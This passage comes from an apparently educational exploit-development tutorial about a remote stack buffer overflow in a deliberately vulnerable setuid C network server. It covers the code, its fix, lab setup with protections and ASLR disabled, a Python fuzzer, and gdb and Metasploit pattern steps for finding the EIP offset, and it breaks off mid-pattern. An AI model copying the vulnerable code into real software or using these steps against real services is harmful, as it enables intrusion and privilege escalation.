class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main differences here are that the communication between the user and the application is done over a network, instead of via command line arguments, and that there is no format string vulnerability./p h3The Fix/h3 pThe vulnerability is in the same line as the a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"plain buffer overflow post/a in the codecheckpass/code function on line 82. This should be changed to codestrncpy(p, a, sizeof(p)-1);/code and explicitly insert the null character at the end codep[512] = '\0';/code./p h2Setting Up The Environment/h2 pThere are 3 main differences (and a few minor ones) when doing exploit development for remote applications. The first is pretty obvious, when doing exploit research it is impossible to develop an exploit on a target application which resides on a machine which you don't control./p pWhile its best not to develop an exploit on a target machine (because you want to be as quiet as possible so not to raise suspicion of the administrator), with local application attacks it is assumed that you already have access to the machine (otherwise you will not be able to attack it) so it is totally possible to do the development on the target machine providing the tools that you need are on there (ie. a debugger, disassembler, compiler...) or you have the means to install them./p pBut with a network application it is unlikely that you already have access to the machine and as we have seen in the first 2 parts of this series while you are developing the exploit you will need to restart the application numerous times. For this reason it is best to do a lot of reconnaissance to get as much information about the environment that the application is running in as possible because you will then want to try to replicate that environment as much as possible for the development environment./p pThe more you replicate the real environment, the more likely you will succeed with the actual exploitation./p pI will be using the same system and environment as before but I will create a new user to run the application as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"root@dev:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 8/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 8/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"appuser@dev:~$ /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 91 May 5 09:51 secret.txt/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat secret.txt /span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pSo this is the setup for my development environment, my attack and target machine are the same machine, I'll just be using seperate user accounts./p pI will be attacking the application over the a href="http://www.tldp.org/LDP/nag/node66.html" target="_blank"loopback interface/a (127.0.0.1). The actual network you attack over is irrelevant I'm using the same machine and the loopback interface for simplicity and reliability./p pThe application will be running as the user codeappuser/code, the application again has the setuid bit set because the file that it sends when the correct password is received is only readable by root. This also means we are able to elevate our privileges to root as in the last 2 parts./p pWe now need to run the application on the "server side":/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table pThe server is now listening on port 9999:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanlsof span class="p"|/span grep -i listen span class="p"|/span grep span class="m"9999/span/span span class="code-line"span class="go"app-net 18826 root 3u IPv4 191330 0t0 TCP *:9999 (LISTEN)/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The App/h2 pFirst we need to look at what output we should expect normally:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"echo/span -n span class="s2"quot;Aquot;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"span class="go"Wrong password: A/span/span span class="code-line"/code/pre/div /td/tr/table pSo we get "Wrong password: " and our input, I'm going to show you 2 ways to do this, first we write a fuzzer and launch it like before, we can use this python script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="k"for/span span class="n"i/span span class="ow"in/span span class="nb"range/spanspan class="p"(/spanspan class="mi"1/spanspan class="p",/spanspan class="mi"5001/spanspan class="p"):/span span class="c1"# loop through 1 to 5001/span/span span class="code-line" span class="c1"# and use i as the incrementor/span/span span class="code-line"/span span class="code-line" span class="c1"# create a TCP socket (AF_INET = IP and SOCK_STREAM = TCP)/span/span span class="code-line" span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# use that socket and connect to 127.0.0.1:9999/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line" span class="c1"# send quot;Aquot; i number of times over the connection/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# store the reply in a variable called reply/span/span span class="code-line" span class="n"reply/span span class="o"=/span span class="n"s/spanspan class="o"./spanspan class="n"recv/spanspan class="p"(/spanspan class="mi"2048/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# close the socket/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/span span class="code-line" span class="c1"# check the output is what we expect/span/span span class="code-line" span class="k"if/span span class="n"reply/span span class="o"!=/span span class="s2"quot;Wrong password: quot;/span span class="o"+/span span class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p":/span/span span class="code-line"/span span class="code-line" span class="c1"# and if not break out of the loop/span/span span class="code-line" span class="k"break/span/span span class="code-line"/span span class="code-line"span class="c1"# print what number we got to/span/span span class="code-line"span class="nb"print/span span class="n"i/span/span span class="code-line"/code/pre/div /td/tr/table pRun the script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-fuzz.py/span span class="code-line"span class="go"528/span/span span class="code-line"/code/pre/div /td/tr/table pNow we have to verify how far it is until we overwrite EIP:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spangdb -q ./app-net/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 528#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 530#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x000a4141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table pSo the next 4 bytes after the first 528 bytes that we send overwrite EIP, lets use the second method to verify this./p pThe second method involves using a couple of tools that come with a href="https://en.wikipedia.org/wiki/Metasploit_Project" target="_blank"metasploit/a (codepattern_create.rb/code and codepattern_offset.rb/code). First we create a pattern of 5000 bytes using codepattern_create.rb/code, send this and use codepattern_offset.rb/code to find out where we overwrote EIP:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spangdb -q ./app-net/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"cd/span /usr/share/metasploit-framework/tools//span span class="code-line"span class="gp"testuser@dev:/usr/share/metasploit-framework/tools$ /span./pattern_create.rb span class="m"5000/span/span span class="code-line"span class="go"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1F